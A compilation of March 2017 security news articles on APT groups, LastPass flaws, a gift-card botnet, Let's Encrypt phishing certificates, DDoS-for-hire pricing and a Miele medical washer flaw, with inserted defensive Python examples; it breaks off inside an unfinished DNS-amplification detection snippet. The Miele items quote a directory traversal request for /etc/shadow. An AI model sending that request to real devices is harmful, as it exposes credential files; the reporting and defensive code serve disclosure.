Palo Alto Networks has also found more evidence linking the Shamoon attacks to the Magic Hound group. According to the security firm, one of the command and control (C&C) servers used by Magic Hound and a server hosting Shamoon files used IP addresses from the same range, namely 45.76.128.x. Another similarity is related to the use of PowerShell and Meterpreter.

Palo Alto Networks agrees with Symantec on the theory that Magic Hound may have conducted the reconnaissance phase of the Shamoon 2 attacks.


Google Researcher Finds New Flaw in LastPass

28.3.2017 Securityweek Vulnerebility
Google Project Zero researcher Tavis Ormandy has identified yet another serious vulnerability in the LastPass browser extension. The developers of the password manager are aware of the flaw and are working on a patch.

Since the vulnerability has not been fixed, only a few details have been made public by Ormandy and LastPass. The researcher said the security hole affects the latest version of the app, and the exploit he developed should work on all web browsers.

Similar to a previously found weakness, this vulnerability can be exploited to steal a user’s passwords and, if the LastPass binary component is enabled, execute arbitrary code.

“This attack is unique and highly sophisticated,” LastPass said in a blog post. “We don’t want to disclose anything specific about the vulnerability or our fix that could reveal anything to less sophisticated but nefarious parties. So you can expect a more detailed post mortem once this work is complete.”

Since these vulnerabilities can typically be exploited by getting the targeted user to access a specially crafted web page, LastPass has advised customers to protect themselves against potential attacks by using the LastPass Vault to access websites in order to ensure that the site they visit is legitimate. Users have also been advised to enable two-factor authentication when possible and beware of phishing attempts.

In recent weeks, Ormandy has identified several serious LastPass vulnerabilities that can be exploited to steal user passwords or execute arbitrary code. LastPass has released patches within days after learning of their existence. The fixes are pushed out automatically and users don’t have to take any action.

There is no evidence of exploitation in the wild and LastPass told users that there is no need to change any passwords.

One of the vulnerabilities found by the Google researcher affected the 3.3.2 version of the Firefox extension. LastPass addressed the vulnerability, but the company pointed out that it plans to retire this branch in the near future.


Botnet Pummels Retail Websites in Hunt for Gift Card Balances

28.3.2017 Securityweek BotNet

Malicious Bot Checked More Than 4 Million Gift Card Numbers Per Hour in Search of Active Cards With Balances

A recently discovered Internet bot is conducting sustained attacks against retailers and checking millions of gift card numbers to determine if any have balances, Distil Networks researchers warn.

Dubbed GiftGhostBot, the sophisticated bot was detected on February 26, 2017 and has managed to hit nearly 1,000 websites to date, the researchers say. The bot is still active, and targeting retailers around the world at a rate of millions of requests per hour.

“The websites of retailers all over the globe are targets. Gift cards are typically associated with a particular company, and can be used to purchase any item sold by that company. Any website with gift card processing capability, including checking your gift card balance or replenishing funds, is a potential target,” the security firm reveals.

The bot uses card cracking or token cracking attacks where automation is leveraged to test a list of potential account numbers and request the balance. When such a balance is provided, the attacker knows that the account number exists and contains funds.

This information allows bot operators to use the account number to purchase goods, though they could also sell those accounts on the dark web. Stealing money from gift cards is typically anonymous and untraceable, allowing cybercriminals to abuse the method with little fear of being caught.

GiftGhostBot was observed reaching peaks of over 4 million requests per hour on some retailer websites, hitting nearly ten times the normal level of traffic on those domains. In addition to stealing users’ funds, the bot can cause slowdowns or site downtime.

Distil Networks classifies GiftGhostBot as an Advanced Persistent Bot (APB), because it has multiple functions. The bot rotates user-agent strings to hide its identity and is heavily distributed across various hosting providers and data centers worldwide. Moreover, it can mimic a normal browser, courtesy of high sophistication when executing JavaScript, and shows increased flexibility in the use of different attack techniques to avoid being blocked.

Distil Networks found five main profiles used in the attack, with the first three used at the beginning of the campaign, and the other two (where the bot identified itself as iPhone and Android user agents) developed after the previous ones were blocked. GiftGhostBot appears well-funded, considering that the cost of the attack increased significantly with the new profiles, as each “request would cost at least five times more by using mobile ISPs,” the researchers say.

“We detected on average 6,400 unique fingerprints per hour. Because the device fingerprint is more accurate than an IP address and user agent you see the average number of user agents detected were higher at 6,500 per hour, and that IP addresses were detected at an average rate of 29,000 per hour. All of these numbers indicate that the bot was distributing itself widely and trying to hide,” Distil's researchers said.

While retailers shouldn’t be blamed for these attacks, they can thwart them by implementing a CAPTCHA on the Check-your-Gift-Card-Balance pages, by keeping an eye on their traffic to determine if they are targeted, and by limiting the number of requests on gift card pages.

Consumers are advised to always keep track of their balance and to not leave money unused. However, because some retailers’ websites are under sustained attack from this bot, users might experience issues when attempting to check the balance on their gift cards. For example, websites might seem unable to provide the requested information, Distil Networks explains.


FBI Warns Healthcare Industry of FTP Attacks

28.3.2017 Securityweek Attack

The Cyber Division of the U.S. Federal Bureau of Investigation (FBI) has issued an alert to warn the healthcare industry that malicious actors are actively targeting File Transfer Protocol (FTP) servers that allow anonymous access.

According to the law enforcement agency, attackers have targeted the FTP servers of medical and dental facilities in an effort to obtain access to protected health information (PHI) and personally identifiable information (PII), and use it to intimidate, blackmail and harass business owners.

“The FBI recommends medical and dental healthcare entities request their respective IT services personnel to check networks for FTP servers running in anonymous mode. If businesses have a legitimate use for operating a FTP server in anonymous mode, administrators should ensure sensitive PHI or PII is not stored on the server,” the FBI said.

The agency cited research conducted in 2015 by the University of Michigan, which showed that more than one million FTP servers had been configured for anonymous access. These servers allow users to authenticate with only a username, such as “anonymous” or “ftp,” and either a generic password or no password at all.

The FBI pointed out that vulnerable FTP servers can also be abused to store malicious tools or to launch cyberattacks.

“In general, any misconfigured or unsecured server operating on a business network on which sensitive data is stored or processed exposes the business to data theft and compromise by cyber criminals who can use the data for criminal purposes such as blackmail, identity theft, or financial fraud,” the FBI warned.
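The check the FBI asks IT staff to run, finding FTP servers that accept a login as “anonymous” or “ftp”, can be scripted with Python's standard ftplib. This is an added example, not FBI or vendor tooling; the FakeFtpServer class is a constructed stand-in so the audit can be exercised offline, and the loopback ports it uses are assigned at runtime:

```python
import ftplib
import socket
import threading

# Added example, not FBI or vendor tooling: audit FTP servers for anonymous
# logins. FakeFtpServer is a constructed responder so the example runs offline.


def check_anonymous_ftp(host: str, port: int = 21, timeout: float = 5.0):
    """True if the server accepts an anonymous login, False if it refuses it,
    None if the server could not be reached."""
    ftp = ftplib.FTP()
    try:
        ftp.connect(host, port, timeout=timeout)
    except OSError:
        return None
    try:
        ftp.login()                      # ftplib sends USER anonymous / PASS anonymous@
        return True
    except ftplib.error_perm:            # 530 Login incorrect
        return False
    finally:
        try:
            ftp.quit()
        except (OSError, ftplib.Error):
            ftp.close()


def audit(targets):
    """targets: iterable of (host, port). Returns {'host:port': result}."""
    return {f"{h}:{p}": check_anonymous_ftp(h, p) for h, p in targets}


class FakeFtpServer(threading.Thread):
    """Minimal single-connection FTP responder (constructed for the demo only)."""

    def __init__(self, allow_anonymous: bool):
        super().__init__(daemon=True)
        self.allow_anonymous = allow_anonymous
        self._listener = socket.socket()
        self._listener.bind(("127.0.0.1", 0))   # port chosen by the OS
        self._listener.listen(1)
        self.port = self._listener.getsockname()[1]

    def run(self):
        conn, _ = self._listener.accept()
        self._listener.close()
        user, buf = None, b""
        with conn:
            conn.sendall(b"220 constructed ftp service ready\r\n")
            while True:
                data = conn.recv(1024)
                if not data:
                    return
                buf += data
                while b"\r\n" in buf:
                    line, buf = buf.split(b"\r\n", 1)
                    cmd, _, arg = line.decode("ascii", "replace").partition(" ")
                    cmd = cmd.upper()
                    if cmd == "USER":
                        user = arg.strip().lower()
                        conn.sendall(b"331 Password required\r\n")
                    elif cmd == "PASS":
                        if self.allow_anonymous and user in ("anonymous", "ftp"):
                            conn.sendall(b"230 Anonymous access granted\r\n")
                        else:
                            conn.sendall(b"530 Login incorrect\r\n")
                    elif cmd == "QUIT":
                        conn.sendall(b"221 Goodbye\r\n")
                        return
                    else:
                        conn.sendall(b"502 Command not implemented\r\n")


def demo():
    """Audit one permissive and one locked-down constructed server."""
    open_srv, closed_srv = FakeFtpServer(True), FakeFtpServer(False)
    open_srv.start()
    closed_srv.start()
    return audit([("127.0.0.1", open_srv.port), ("127.0.0.1", closed_srv.port)])


if __name__ == "__main__":
    for target, result in demo().items():
        print(target, {True: "ANONYMOUS LOGIN ACCEPTED", False: "refused", None: "unreachable"}[result])
```

Against real hosts, replace the constructed targets with the inventory of internal FTP servers and treat every True as a finding to review for stored PHI or PII.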

In 2015, IBM named healthcare as the most attacked industry, with more than 100 million records compromised, after in the previous year this sector did not even make it to the top five. An IBM report for 2016 showed that the volume of compromised records was smaller, but the number of data breaches increased, causing operational, reputational and financial damage to healthcare organizations.

A report published recently by Fortinet showed the top threats targeting healthcare companies in the last quarter of 2016, including malware, ransomware, IPS events, exploit kits and botnets.


Let's Encrypt Issues 15,000 Fraudulent "PayPal" Certificates Used for Cybercrime

28.3.2017 Securityweek CyberCrime
Free and open Certificate Authority (CA) Let’s Encrypt has issued nearly 15,000 certificates containing the term “PayPal” for phishing sites to date, a security researcher has discovered.

According to encryption expert Vincent Lynch, 96.7% of the 15,270 security certificates containing the term PayPal that Let’s Encrypt has issued since March last year have been issued for phishing sites. Most of these certificates have been issued since November 2016.

Launched publicly in December 2015 and out of beta in April 2016, Let’s Encrypt is an initiative built on the idea of encrypting websites and serving them over Transport Layer Security (TLS), thus protecting users’ data from eavesdroppers. The CA’s certificates are offered for free, and the issuance and maintenance processes are automated, to make it easier for website owners to obtain certificates.

Even before being launched, Let’s Encrypt fueled fears that it could be abused by cybercriminals for their nefarious purposes. What’s more, the CA claims that it is not its job to stop malicious sites from using its certificates, meaning that phishers can use its certificates without fearing they might be banned, Lynch notes.

“Despite the concerns of many around the industry, Let’s Encrypt’s stance is in full compliance with industry standards. Regardless, that policy in combination with offering free certificates does create a very attractive environment for phishers,” he says.

In early March, the encryption expert urged Let’s Encrypt to stop issuing PayPal certificates because of their use for phishing. At the time, he estimated that the CA had issued 988 certificates containing the term PayPal, and that 99.5% of them were being used (or had been used) for phishing.

Now, based on newly received data, Lynch says that the previous number was a great underestimation and that Let’s Encrypt actually issued a total of 15,270 SSL certificates containing the word “PayPal,” 14,766 of which were (or are) used for phishing. The estimation is based on the analysis of a random sample of 1,000 certificates, 96.7% of which were intended for use on phishing sites.

The number of PayPal certificates issued by Let’s Encrypt has been growing at a steady rate of around 1250 per month since November last year, which was also the first month during which more than 1000 such certificates were issued (and twice the amount issued during the previous month). Thus, the CA issued 2530 PayPal certificates in December 2016, 3995 in January 2017, and 5101 in February 2017.

According to Lynch, there’s no apparent specific cause for the increase. However, it seems that the issuance rate has started to decline this month. Even so, Let’s Encrypt is expected to issue 20,000 additional PayPal certificates by the end of this year.

Phishing sites usually have a very short lifespan, mainly because they tend to be flagged and blocked rather fast, which explains why cybercriminals tend to register as many of them as possible. Making them look as legitimate as possible also helps these sites stay alive for longer.

“The various initiatives encouraging HTTPS are likely to appeal to phishers as well. There are a number of performance benefits (such as HTTP/2) only available to sites using HTTPS. In addition, sites using valid SSL certificates are given trusted UI indicators by browsers (the padlock icon in all browsers, the “Secure” label in Chrome) which make a phishing site look more legitimate,” Lynch notes.

In a mailed comment, Ilia Kolochenko, CEO of web security company High-Tech Bridge, told SecurityWeek that he agrees that CAs shouldn’t be responsible for blocking malicious websites from obtaining security certificates.

“I think we should separate HTTP traffic encryption and website identity verification questions. Let’s Encrypt’s mission is to globally convert plaintext HTTP traffic to encrypted HTTPS traffic, and they are doing it pretty well. Nonetheless, they should have foreseen massive abuse by phishers, and implement at least some basic security verifications, such as refusing SSL certificates for domains that contain popular brand names inside,” he said.

According to Kolochenko, the fact that web browsers mark HTTPS sites as trusted is actually a bigger issue in this regard, because they encourage users to blindly trust the website without any justifiable reason. Because of that, he says, it’s rather difficult to measure whose carelessness contributed more to the increase in phishing campaigns.

However, he also voiced fears that the idea of encrypting all web traffic could result in malware being able to bypass security mechanisms more efficiently:

“I am quite sure that if we will see how many of Let’s Encrypt SSL certificates are used by malware to exfiltrate stolen data – results will be pretty scary. Therefore, it’s difficult to predict how Let’s Encrypt will shape its growth strategy in the future to preclude cybercriminals from abusing its desire to make the web safer.”

Representatives from the Linux Foundation (the group behind the Let's Encrypt project) did not immediately respond to a request for comment.


APT29 group used domain fronting to evade detection long before these techniques were widely known
28.3.2017 Securityweek APT

Experts at FireEye discovered the APT29 group adopted domain fronting long before these techniques were widely known in the IT security community.
Security firm FireEye continues to follow the APT29 group (aka The Dukes, Cozy Bear and Cozy Duke). On Monday it revealed that the cyber spies have been using a technique called “domain fronting” to make the attribution of their attacks harder.

In December, the Signal development team introduced the ‘domain fronting’ technique to circumvent censorship.

The astonishing news is that the APT29 group adopted domain fronting long before these techniques were widely known in the IT security community.

Domain fronting is a technique that relies on the use of different domain names at different application layers to evade censorship.


The domain fronting technique “hides the remote endpoint of a communication. Domain fronting works at the application layer, using HTTPS, to communicate with a forbidden host while appearing to communicate with some other host, permitted by the censor,” as described in a paper published by researchers from the University of California, Berkeley, Psiphon, and Brave New Software.

“The key idea is the use of different domain names at different layers of communication. One domain appears on the “outside” of an HTTPS request—in the DNS request and TLS Server Name Indication—while another domain appears on the “inside”—in the HTTP Host header, invisible to the censor under HTTPS encryption,” the paper continues. “A censor, unable to distinguish fronted and nonfronted traffic to a domain, must choose between allowing circumvention traffic and blocking the domain entirely, which results in expensive collateral damage.”

Domain fronting is easy to deploy and use and does not require any special action by network intermediaries.

The APT29 group has used the domain fronting technique for at least two years; the hackers leveraged the Tor network to communicate with infected machines. In order to disguise Tor traffic as apparently legitimate traffic, the cyberspies used Meek, a Tor plugin specifically designed to implement domain fronting, which allows users to send traffic to Tor inside a harmless-looking HTTPS POST request to google.com.


“APT29 has used The Onion Router (TOR) and the TOR domain fronting plugin meek to create a hidden, encrypted network tunnel that appeared to connect to Google services over TLS.” reads the analysis published by FireEye. “This tunnel provided the attacker remote access to the host system using the Terminal Services (TS), NetBIOS, and Server Message Block (SMB) services, while appearing to be traffic to legitimate websites. The attackers also leveraged a common Windows exploit to access a privileged command shell without authenticating.”

The attackers installed the Tor client and the Meek plugin on the targeted system by using a PowerShell script and a .bat file.

The APT29 group leveraged the Sticky Keys exploit to replace the legitimate executable with the Windows Command Prompt (cmd.exe) file and gain a shell on the targeted system with SYSTEM-level privileges. In this way, the attackers were able to execute several commands, including adding new accounts.

“The attacker executed the PowerShell script C:\Program Files(x86)\Google\start.ps1 to install the TOR services and implement the “Sticky Keys” exploit. This script was deleted after execution, and was not recovered.” continues the analysis.

The script that executes the Sticky Keys exploit is also used to gain persistence on the target machine: it creates a Windows service named “Google Update.”

“By employing a publicly available implementation, they were able to hide their network traffic, with minimal research or development, and with tools that are difficult to attribute. Detecting this activity on the network requires visibility into TLS connections and effective network signatures.” concluded the analysis.


Miele Professional PG 8528 washer-disinfector affected by a Web Server Directory Traversal
28.3.2017 Securityweek IoT

An Internet-Connected Medical Washer-Disinfector, the Miele’s model Professional PG 8528, is affected by a Web Server Directory Traversal.
While the number of IoT devices continues to increase exponentially, the level of security of these smart objects is often inadequate and exposes users to the risk of cyber attacks.

The news of the day is a security vulnerability reported on Full Disclosure that affects an Internet-connected washer-disinfector appliance manufactured by the Germany-based vendor Miele.

According to the security advisory, the Miele Professional PG 8528 appliance is affected by a Web Server Directory Traversal vulnerability tracked as CVE-2017-7240. The Miele Professional PG 8528 is a piece of medical equipment used to disinfect laboratory and surgical instruments. The flaw could be exploited by an unauthenticated attacker to access any directory on the web server.

“The corresponding embedded webserver “PST10 WebServer” typically listens to port 80 and is prone to a directory traversal attack, therefore an unauthenticated attacker may be able to exploit this issue to access sensitive information to aid in subsequent attacks,” reads the advisory.

The flaw could allow attackers to access sensitive data on the server and to drop and execute malicious code on the web server.

The flaw was discovered by the expert Jens Regel at the German consultancy Schneider & Wulf, who reported the issue to Miele in December 2016. Unfortunately, he did not receive a reply from the company, so after four months he decided to publicly disclose it.

Regel also published proof-of-concept (PoC) exploit code for this flaw; for this reason, it is important that the vendor fixes the issue as soon as possible.

Do you want to hack the Miele washer-disinfector?

It is simple: the PoC exploit code is used by the expert to request the embedded system’s shadow file, and by extension any file on the filesystem.

Proof of Concept:
=================
~$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character ist '^]'.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1 to whatever IP the dishwasher has on the LAN.
While waiting for a patch, disconnect the washer-disinfector from the Internet.


Kaspersky Uses Machine Learning in the Cloud to Detect Threats

28.3.2017 SecurityWorld Security
Fraud Prevention Cloud makes it possible to counter fraud carried out through online services. At least, that is what the experts at Kaspersky Lab promise; they developed the new product and built advanced detection methods into it.

In addition to fraud prevention for endpoints and mobile devices, the platform also provides a range of cloud technologies designed specifically to protect banks, financial institutions and government agencies.

These include, in addition to the GDR (global device reputation) reputation database, device and environment analysis, behavioral analytics, biometrics and so-called clientless malware detection.

For example, behavioral analysis and biometrics help determine whether the user is a real person without requiring any additional action from them. This behavior is analyzed through mouse movements, clicks, scrolling or keystrokes. On mobile devices it is done using the accelerometer/gyroscope and gestures (taps, swipes, etc.).

Fraud Prevention Cloud collects and analyzes information about the user's behavior, device, environment and sessions in the form of anonymized, non-personal big data in the cloud. This makes the data available offline for expert forensic and automated analysis.

Information is now also made available to the internal Enterprise Fraud Management system, enabling timely, proactive fraud detection in real time before the fraud is carried out.

This approach is based on Kaspersky's Humachine technology, a combination of big data, threat research and analysis assisted by machine learning algorithms, and the expertise of the company's security teams.

Risk Based Authentication (RBA), in turn, evaluates the risk before the user even logs in to a digital channel. Based on that evaluation, internal backend systems are told whether to allow access, request additional verification or block it.

This feature improves the user experience by minimizing the number of authentication steps for legitimate users, while exposing an illegitimate user before fraud is committed.

Continuous Session Anomaly Detection additionally helps detect fraudulent activity by identifying unauthorized account access, new fraudulent activity on an account, money laundering, automated tools and other suspicious processes during a session.

Fraud Prevention Cloud, however, does not only intervene during login but throughout the entire session. In doing so it builds statistical models of various behavioral patterns using machine learning technologies.

Finally, clientless malware detection combines direct and proactive detection techniques. The direct technique determines whether the user's device is being used for a direct attack on a specific digital service of the organization.

The second, proactive detection technique helps identify malware that does not immediately threaten the organization but could be adapted for malicious purposes and attack in the future. If a real attack does occur, these techniques minimize risks and losses.


Internet-Connected Medical Washer-Disinfector Found Vulnerable to Hacking
27.3.2017 thehackernews IoT


Internet-of-Things devices are turning every industry into the computer industry, making customers think that their lives would be much easier with smart devices.
There are, of course, some really good reasons to connect certain devices to the Internet. For example, remotely switching on your A/C a few minutes before you enter your home, instead of leaving it blasting all day.
But does everything need to be connected?
Of course not. One such example is the latest bug report at Full Disclosure, affecting an Internet-connected washer-disinfector appliance by Germany-based manufacturer Miele.
The Miele Professional PG 8528 appliance, which is used in medical establishments to clean and properly disinfect laboratory and surgical instruments, is suffering from a Web Server Directory Traversal vulnerability.
Jens Regel of German consultancy Schneider & Wulf has discovered the flaw (CVE-2017-7240) that allows an unauthenticated, remote attacker to access directories other than those needed by a web server.
Once accessed, the attacker can steal sensitive information stored on the server and even insert their own malicious code and tell the web server to execute it.
"The corresponding embedded web server 'PST10 WebServer' typically listens to port 80 and is prone to a directory traversal attack, [and] therefore an unauthenticated attacker may be able to exploit this issue to access sensitive information to aid in subsequent attacks," Regel explained.
Proof-of-Concept Exploit Code Released!
Regel also published proof-of-concept (PoC) exploit code for this vulnerability, which means hackers can now exploit the vulnerability before the vendor issues a patch.
The PoC exploit is simple for anyone to run:
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1 to whatever IP the dishwasher has on the LAN.
It's unclear which libraries Miele used to craft the Web server, though, according to Regel, he's able to request the embedded system's shadow file – and by extension any file on the filesystem.
The researcher privately disclosed the vulnerability to Miele in November 2016, but did not hear back from the vendor for more than three months. So, when a fix can be expected (or whether one exists) is still unknown.
Therefore, the best option to keep yourself secure is to disconnect the appliance from the Internet for the time being until the patch is released.
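Both articles about CVE-2017-7240 describe the same bug class: a web server that maps the request path onto its document root without confining the result. The following is an added example, not Miele's PST10 WebServer code (whose internals are not public): a naive resolver with that defect beside a hardened one, run over the published PoC path, a percent-encoded variant and a legitimate request, against a constructed temporary document root:

```python
import os
import posixpath
import tempfile
from urllib.parse import unquote

# Added example, not code from Miele's PST10 WebServer: a naive document-root
# resolver with the class of bug the advisory describes, beside a hardened one.


def naive_resolve(docroot: str, url_path: str) -> str:
    """Vulnerable: glues the request path onto the docroot, so a request for
    /../../../etc/shadow normalises to a path outside the document root."""
    return os.path.normpath(docroot + url_path)


def safe_resolve(docroot: str, url_path: str):
    """Hardened: percent-decode once, refuse '..' segments and NUL bytes,
    then prove the real path is still inside the real docroot.
    Returns the filesystem path, or None if the request must be refused."""
    decoded = unquote(url_path)
    if "\x00" in decoded or ".." in decoded.split("/"):
        return None
    relative = posixpath.normpath("/" + decoded).lstrip("/")   # collapse ./ and //
    root = os.path.realpath(docroot)
    candidate = os.path.realpath(os.path.join(root, relative))  # follows symlinks
    try:
        if os.path.commonpath([root, candidate]) != root:
            return None                    # escaped via symlink or other trick
    except ValueError:                     # paths on different drives (Windows)
        return None
    return candidate


def demo(docroot: str) -> dict:
    """Run the advisory's request and two variants through both resolvers.
    Returns {request: (naive_result, safe_result)}."""
    requests = [
        "/../../../../../../../../../../../../etc/shadow",   # the published PoC path
        "/%2e%2e/%2e%2e/%2e%2e/etc/shadow",                  # percent-encoded traversal
        "/status/index.html",                                # legitimate request
    ]
    return {r: (naive_resolve(docroot, r), safe_resolve(docroot, r)) for r in requests}


def demo_in_tempdir():
    """Run demo() against a fresh constructed docroot; returns (real_root, results)."""
    tmp = tempfile.mkdtemp(prefix="docroot-")
    return os.path.realpath(tmp), demo(tmp)


if __name__ == "__main__":
    root, results = demo_in_tempdir()
    print("docroot:", root)
    for request, (naive, safe) in results.items():
        print(f"{request}\n  naive -> {naive}\n  safe  -> {safe}")
```

The naive resolver hands back /etc/shadow for the PoC request; the hardened one refuses both traversal forms and serves only paths that still sit under the document root after symlink resolution.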


APT29 Cyberspies Use Domain Fronting to Evade Detection

27.3.2017 securityweek APT
The Russia-linked cyber espionage group known as APT29 has been using a technique called “domain fronting” in an effort to make it more difficult for targeted organizations to identify malicious traffic, FireEye reported on Monday.

Domain fronting is a censorship bypassing technique that involves disguising traffic to make it look as if it’s going to a host allowed by the censor, such as Google, Amazon or CloudFlare. Open Whisper Systems recently implemented the technique to help Signal users in Egypt and the United Arab Emirates bypass government censorship.

According to FireEye, the technique has been used for at least two years by the threat actor APT29, which is also known as The Dukes, Cozy Bear and Cozy Duke. The group is believed to be behind the recent election-related attacks in the U.S. and a campaign targeting high-profile organizations in Norway.

APT29 has used the Tor anonymity network to communicate with infected machines, which could be considered suspicious by some defenders. In order to disguise Tor traffic as apparently legitimate traffic, the cyberspies used Meek, a Tor plugin that implements domain fronting and allows users to send traffic to Tor inside a harmless-looking HTTPS POST request to google.com.

In its attacks, APT29 used a PowerShell script and a .bat file to install the Tor client and the Meek plugin on the targeted system. They leveraged an exploit involving the Sticky Keys accessibility feature, where they replaced the legitimate executable with the Windows Command Prompt (cmd.exe) file. This provides the attacker a shell that they can use to execute commands with SYSTEM-level privileges, including to add or modify accounts.

The script that executes the Sticky Keys exploit also creates a Windows service named “Google Update” to ensure that the backdoor remains even after the system has been rebooted.

“APT29 adopted domain fronting long before these techniques were widely known,” said FireEye’s Matthew Dunwoody. “By employing a publicly available implementation, they were able to hide their network traffic, with minimal research or development, and with tools that are difficult to attribute. Detecting this activity on the network requires visibility into TLS connections and effective network signatures.”


Czech Leader Says Computer Hacked With Child Porn

27.3.2017 securityweek Hacking
Czech President Milos Zeman has alleged that hackers based in the US state of Alabama put child pornography on one of his computers a year ago, his official website said Monday.

The ex-communist known for staunch anti-Muslim, pro-Russian and pro-Chinese views announced earlier this month that he would run for a second five-year term in January's presidential election.

"About a year ago, someone installed child pornography on my computer," Zeman said, according to a transcript of an interview with the Frekvence 1 commercial radio station posted to his website.

"I looked at it for about 10 seconds before I realised what was going on," said Zeman, a 72-year-old veteran leftwinger and the first-ever directly elected Czech head of state.

Zeman added that he had initially considered filing a criminal complaint, but then changed his mind after consulting his IT staff.

Hackers have also targeted other senior Czech officials.

Foreign Minister Lubomir Zaoralek said in January that hackers had compromised his official email account as well as dozens of others belonging to ministry employees.

Zaoralek said the data leak was "considerable" but that no classified information had been stolen.

Politicians worldwide are falling prey to hack attacks with ever increasing frequency.

US intelligence in January accused Russian President Vladimir Putin of ordering a campaign of hacking and media manipulation aimed at undermining Hillary Clinton's presidential campaign in favor of Donald Trump.

Last October, Czech police arrested a Russian hacker in Prague in cooperation with the FBI and accused him of staging cyber attacks on the United States.

The hacker is in custody in the Czech Republic pending extradition to the United States or Russia as both countries have asked Prague to hand over the suspect.


 


The cost of launching a DDoS attack
27.3.2017 Kaspersky Attack
BOTNETS DDOS-ATTACKS
A distributed denial-of-service (DDoS) attack is one of the most popular tools in the cybercriminal arsenal. The motives behind such attacks can vary – from cyber-hooliganism to extortion. There have been cases where criminal groups have threatened their victims with a DDoS attack unless the latter paid 5 bitcoins (more than $5,000). Often, a DDoS attack is used to distract IT staff while another cybercrime such as data theft or malware injection is carried out.

Almost anyone can fall victim to a DDoS attack. They are relatively cheap and easy to organize, and can be highly effective if reliable protection is not in place. Based on analysis of the data obtained from open sources (for example, offers to organize DDoS attacks on Internet forums or in Tor), we managed to find out the current cost of a DDoS attack on the black market. We also established what exactly the cybercriminals behind DDoS attacks offer their customers.

DDoS as a service

Ordering a DDoS attack is usually done using a full-fledged web service, eliminating the need for direct contact between the organizer and the customer. The majority of offers that we came across left links to these resources rather than contact details. Customers can use them to make payments, get reports on work done or utilize additional services. In fact, the functionality of these web services looks similar to that offered by legitimate services.

 

Example of a web service for ordering DDoS attacks that looks more like the web page of an IT startup than a cybercriminal operation

These web services are fully functional web applications that allow registered customers to manage their balance and plan their DDoS attack budget. Some developers even offer bonus points for each attack conducted using their service. In other words, cybercriminals have their own loyalty and customer service programs.

 

DDoS service advertised on a Russian public forum offering attacks from $50 per day

Some of the services we identified contained information on the number of registered users, as well as data on the number of attacks carried out per day. Many of the web services offering DDoS attacks claimed to have tens of thousands of registered accounts. However, these figures may be inflated by the owners of services to make their resources look more popular.

 

Statistics provided by one service to demonstrate its popularity with DDoS customers (479270 implemented attacks)

 

Statistics provided by one service to demonstrate the popularity of DDoS attack scenarios

 

Information about the popularity of a DDoS service

Rates for DDoS

The special features emphasized in the adverts for DDoS services can give a particular service an advantage over its competitors and sway the customer’s choice:

The target and its characteristics. A cybercriminal that agrees to attack a government resource will attract customers who are interested in this particular service. The attacker can ask for more money for this type of service than they would for an attack on an online store. The cost of the service may also depend on the type of anti-DDoS protection the potential victim has: if the target uses traffic filtering systems to protect its resources, the cybercriminals have to come up with ways of bypassing them to ensure an effective attack, and this also means an increase in the price.

Attack sources and their characteristics. This factor can determine the price the attackers ask for conducting their attacks. The cheaper it is for a criminal to maintain a botnet (defined, for example, by the average cost of infecting a device and including it in a botnet), the more likely they are to ask for bargain-basement prices for their services. For example, a botnet of 1000 surveillance cameras may be cheaper in terms of organization than a botnet of 100 servers. This is because cameras and other IoT devices are currently less secure – a fact that is often ignored by their owners.

Attack scenario. Requests for atypical DDoS attacks (for example, the customer may ask the botnet owner to alternate between different methods of DDoS attacks within a short period of time or implement several methods simultaneously) can increase costs.

The average cost of a DDoS attack as a service in a particular country. Competition can cause cybercriminals to raise or lower the cost of their services. They also try to take into consideration the ability of their audience to pay and devise their pricing policy accordingly (for example, a DDoS attack will cost US customers more than a similar offer in Russia).

Along with specific botnet features, the organizers of DDoS services also offer customers a tariff plan in which the buyer pays a per-second rental price for botnet capacity. For example, a DDoS attack of 300 seconds using a botnet with a total bandwidth of 125 Gbps will cost €5, with all other characteristics (power and scenarios) remaining the same for all tariffs.

 

The price list for one of the biggest services offering DDoS attacks

A DDoS attack lasting 10,800 seconds will cost the client $60, or approximately $20 per hour. The attack specifications (scenario and computing power used) were not always stated on the customer-facing resource. Apparently, not all cybercriminals consider it appropriate to disclose the inner workings of their botnet (it’s also possible that some owners don’t actually understand the technical characteristics of their botnets). In particular, they don’t disclose the type of bots included in a botnet.

The price includes implementation of the following rather trivial scenarios:

SYN-flood;
UDP-flood;
NTP-amplification;
Multi-vector amplification (several amplification scenarios simultaneously).
 

The price list for a service that, with just a few clicks, allows clients to order a DDoS attack on an arbitrary resource accompanied with a detailed report

Some services offer a choice of attack scenario, which allows cybercriminals to combine different scenarios and perform attacks tailored to the individual characteristics of the victim. For example, if the victim successfully combats SYN-flood, the attacker can switch the scenario on the control panel and evaluate the victim’s reaction.

 

Various tariffs of an English-language service that varies its pricing according to the number of seconds a DDoS attack lasts

Among the offers we analyzed there were some in which the attackers stated different prices for their services depending on the type of victim.

 

Information found on a Russian site dedicated entirely to DDoS services

For example, the cybercriminals ask for $400 per day to attack a site/server that uses anti-DDoS protection, which is four times more expensive than an attack on an unprotected site.

Moreover, not all cybercriminals offering DDoS attacks will agree to attack government resources: such sites are closely monitored by law enforcement agencies, and the organizers don’t want to expose their botnets. However, we did come across services offering attacks on government resources as a separate item in the price list.

 

“The price may change if the resource has political status” reads a resource promoting DDoS attacks

Interestingly, some criminals see nothing wrong with providing protection from DDoS along with their DDoS attack services.

 

Some services offering DDoS attacks may also offer protection from such attacks

Pricing: a “cloud” example

Let’s consider a DNS amplification attack scenario. This type of attack involves the sending of a specially formed request (for example, 100 bytes in volume) to a vulnerable DNS server that responds to the “sender” (i.e. the victim) with a larger volume (kilobyte) of data. The botnet may consist of tens or even hundreds of such servers or the resources of a public cloud service provider. Add in public web load testing services that can be used to carry out a SaaS amplification attack, and we end up with a fairly heavy “sledgehammer”.

 

DDoS = Cloud + DNS Amplification + SaaS Amplification
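The amplification scenario just described has a recognizable footprint on the victim's side: many DNS resolvers that were never queried by the victim all answering at once, with replies far larger than a normal DNS response. The following is an added example, not Kaspersky's code, that scores destinations in a set of constructed NetFlow-style packet records and flags the ones receiving reflected, amplified DNS traffic; the thresholds and the sample addresses (RFC 5737 documentation ranges) are assumptions of the example.

```python
from collections import defaultdict

# Constructed packet records in a NetFlow-like shape. A real collector would
# supply these from a span port or flow export; here they are built inline.
SAMPLE_FLOWS = [
    # Reflected, amplified replies: four open resolvers answering a spoofed
    # query, every reply landing on the same victim with a ~1 KB payload.
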